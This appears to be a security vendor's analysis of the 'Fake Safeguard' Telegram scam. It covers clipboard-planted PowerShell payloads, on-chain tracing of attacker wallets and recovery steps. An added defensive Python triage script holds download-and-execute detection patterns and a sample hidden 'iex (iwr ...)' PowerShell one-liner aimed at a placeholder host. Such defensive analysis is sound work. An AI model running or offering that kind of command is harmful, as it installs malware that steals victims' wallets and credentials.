Recently, we have received numerous requests for help from victims, all related to the “Fake Safeguard” scam on Telegram. As many users are unfamiliar with this type of attack, they often lack vigilance when encountering such scams, making both novice and experienced players susceptible to falling victim. This article will delve into the tactics of this scam and provide effective preventive advice to help users protect their assets from loss.
**Scam Analysis**
This type of scam can be categorized into two main types. One involves stealing Telegram accounts, where scammers trick users into entering their phone numbers, verification codes, or even Two-Step Verification passwords to gain access to their Telegram accounts. The other method involves implanting malware onto users’ computers, which has been increasingly common recently. This article will focus on the latter approach.
During certain high-profile token airdrop events, when users are experiencing FOMO, they may come across the following Channel interface on Telegram and inevitably click on “Tap to verify”:
Clicking on “Tap to verify” opens a fake Safeguard bot, which superficially displays a verification process. The verification window stays open only briefly, creating a sense of urgency that pushes users to keep clicking.
On the next click, it “falsely” reports that verification has failed, and finally a manual verification prompt appears:
The scammers have thoughtfully provided Step 1, Step 2, and Step 3. By this point, the bot has already written malicious code to the user’s clipboard; as long as the user does not carry out these steps, nothing is executed and there should be no problem:
However, if the user obediently follows these steps, their computer will become infected with a virus.
Another example involves attackers impersonating KOLs and using malicious bots to guide users into executing malicious PowerShell code. Scammers create fake KOL accounts on X, then attach Telegram links in the comments section, inviting users to join an “exclusive” Telegram group for investment information. For instance, a scam account appeared in the comments section of @BTW0205, where many users encountered “exciting messages”:
They would then enter the corresponding Telegram Channel, which guides users to verify.
When users click to verify, a fake Safeguard appears, similar to the aforementioned process, with Step 1, Step 2, and Step 3 guiding the verification operation.
At this point, the user’s clipboard has secretly been loaded with malicious code. If the user actually follows the instructions, opens the Run box and pastes the clipboard contents into it with Ctrl + V, the result looks like the following image: most of the content is hidden, and a large run of blank space at the front, carrying the Telegram logo, keeps the malicious code out of view.
These payloads are usually PowerShell commands which, when executed, silently download more complex malware, ultimately infecting the computer with a remote access trojan (such as Remcos). Once the computer is under the trojan’s control, hackers can remotely steal sensitive information from it, including wallet files, recovery phrases, private keys, passwords, and more, leading to asset theft. (PS: For more on the behavior of the “Fake Safeguard” trojan, refer to the analysis by SlowMist white hat Jose: https://jose.wang/2025/01/17/%E4%BC%AASafeguard%E7%97%85%E6%AF%92%E5%88%86%E6%9E%90/)
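As an added defensive example (not SlowMist’s code and not part of the original article), the script below triages text of the kind the scam plants on the clipboard: it measures the blank-space padding that pushes the real command out of the Run box’s visible field, looks for a decoy comment mentioning Telegram, and scores common PowerShell download-and-run indicators. The sample pastes, the indicator list and the scoring thresholds are all constructed assumptions for illustration; the only real artifact used is the `Explorer\RunMRU` registry key, which Windows uses to record what was typed into the Run box, so a victim can check whether such a command was ever run on the machine.

```python
"""Heuristic triage for 'Fake Safeguard'-style clipboard payloads.

Added example, not the article's or SlowMist's own tooling. It scores a
string a user may have pasted into the Run box for the traits the article
describes: long leading padding that hides the command, a decoy comment
naming Telegram, and a PowerShell invocation that fetches and runs code.
"""
import re
import sys

# Constructed, non-exhaustive defender heuristics (assumption: these
# patterns are representative of the one-liners seen in this scam family).
INDICATORS = {
    "powershell_launch": re.compile(r"\b(powershell|pwsh|mshta|cmd)(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_run": re.compile(
        r"(iex|invoke-expression|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b)",
        re.I,
    ),
    "url": re.compile(r"https?://[^\s'\"]+", re.I),
}
DECOY = re.compile(r"#.*(telegram|verify|captcha|not a robot)", re.I)
PADDING_THRESHOLD = 40  # spaces needed to push a command out of the Run box


def analyze_paste(text: str) -> dict:
    """Return a triage verdict for text pasted into the Run box or a shell."""
    stripped = text.lstrip()
    padding = len(text) - len(stripped)
    # A Run-box command has no reason to start with dozens of spaces or to
    # contain line breaks; both mean the visible part is not what executes.
    hidden_by_padding = padding >= PADDING_THRESHOLD or "\n" in text.strip() or "\r" in text
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    decoy = bool(DECOY.search(text))
    score = sum(hits.values()) + int(hidden_by_padding) + int(decoy)
    return {
        "padding_chars": padding,
        "hidden_by_padding": hidden_by_padding,
        "decoy_comment": decoy,
        "indicators": [name for name, hit in hits.items() if hit],
        "score": score,
        "verdict": "malicious" if score >= 3 else "suspicious" if score >= 1 else "clean",
        "command_preview": stripped[:80],
    }


def read_run_mru() -> list:
    """On Windows, list what was previously typed into the Run box.

    Explorer stores each entry under HKCU\\...\\Explorer\\RunMRU with a
    trailing "\\1". Returns [] on other platforms or if the key is absent.
    """
    try:
        import winreg
    except ImportError:
        return []
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    entries = []
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            index = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, index)
                except OSError:
                    break
                index += 1
                if name != "MRUList" and isinstance(value, str):
                    entries.append(value[:-2] if value.endswith("\\1") else value)
    except OSError:
        return []
    return entries


# Constructed sample pastes (not captured from a real victim).
SAMPLES = {
    "benign": "notepad.exe",
    # Shaped like the article's description: heavy space padding, a comment
    # naming Telegram, then a hidden PowerShell download-and-run one-liner
    # pointing at a placeholder host that cannot resolve.
    "fake_safeguard": (
        " " * 120
        + "# Telegram verification\r\n"
        + 'powershell -w hidden -c "iex (iwr http://example.invalid/x)"'
    ),
}

if __name__ == "__main__":
    # Usage: python triage.py            -> analyze the constructed samples
    #        python triage.py --stdin    -> analyze text piped on stdin
    if "--stdin" in sys.argv:
        print(analyze_paste(sys.stdin.read()))
    else:
        for label, text in SAMPLES.items():
            print(label, "->", analyze_paste(text))
    for entry in read_run_mru():
        print("RunMRU:", analyze_paste(entry)["verdict"], entry[:80])
```

The verdict is a triage aid, not proof: a hit on a single indicator (for example a plain `cmd`) only rates “suspicious”, while the combination of padding, a decoy comment and a hidden download-and-execute chain is what the scam relies on and what scores “malicious”. On a Windows machine, any RunMRU entry that scores “malicious” is a strong sign the article’s steps were actually followed and the incident-response steps below apply.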
The Ethereum Foundation’s account @ethereumfndn has also had its comment section polluted by this scam, showing how indiscriminately these scams cast their net to harvest victims.
Recently, even Trump’s X comment section has been affected by this scam:
If you go through the flow from a mobile device, the scam instead works step by step toward taking over your Telegram account. If you notice in time, it is crucial to go immediately to Telegram settings, navigate to Privacy and Security -> Active sessions -> Terminate all other sessions, and then add or change your Two-Step Verification password.
If you are using a Mac instead of a Windows computer, similar methods exist to lure you into infecting your computer. The tactics are the same: when the following image appears in Telegram, your clipboard has already been covertly loaded with malicious code.
At this point, there may be no immediate risk, but if you follow the provided steps, you will face the consequences shown in the following image:
**MistTrack Analysis**
We selected several hacker addresses and analyzed them using the on-chain tracking and anti-money laundering platform MistTrack.
Solana hacker addresses:
HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV
2v1DUcjyNBerUcYcmjrDZNpxfFuQ2Nj28kZ9mea3T36W
D8TnJAXML7gEzUdGhY5T7aNfQQXxfr8k5huC6s11ea5R
According to MistTrack’s analysis, these three hacker addresses have collectively profited over $1.2 million, including SOL and multiple SPL Tokens.
Hackers initially convert most SPL Tokens into SOL:
Then, they disperse the SOL into multiple addresses, and the hacker addresses interact with platforms such as Binance, Huobi, and FixedFloat:
Additionally, the address HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV still has a balance of 1,169.73 SOL and over $10,000 worth of Tokens.
We also analyzed one of the Ethereum hacker addresses, 0x21b681c98ebc32a9c6696003fc4050f63bc8b2c6, which made its first transaction in January 2025, is active on multiple chains, and currently holds a balance of about $130,000.
This address transferred ETH to several platforms such as ChangeNOW, eXch, and Cryptomus.com:
**How to Prevent**
If your computer has been compromised, you need to take immediate action:
1. Immediately move the funds out of every wallet that was used on this computer; do not assume a browser-extension wallet is safe just because it is password-protected;
2. Change the passwords and 2FA of all accounts saved in any browser on the computer or previously logged in from it;
3. Re-secure every other account used on the computer, such as Telegram, wherever possible.
Make the most extreme assumption: since your computer has been infected, treat everything on it as fully visible to the scammers. Then think in reverse: if you were a scammer with complete control of a computer that actively participates in the Web3/Crypto world, what would you do? Finally, after backing up important data, reinstall the system, and install an internationally recognized antivirus product such as AVG, Bitdefender, or Kaspersky for ongoing protection. Once these issues are handled, you should be in a good position.
**Conclusion**
The Fake Safeguard scam has evolved into a mature attack model whose full chain, from impersonating comments to implanting trojans and finally stealing assets, is covert and efficient. As attack methods become increasingly sophisticated, users must remain vigilant against misleading links and “verification” steps online. By raising awareness, strengthening protection, and promptly identifying and addressing potential threats, it is possible to effectively guard against the harm of such scams.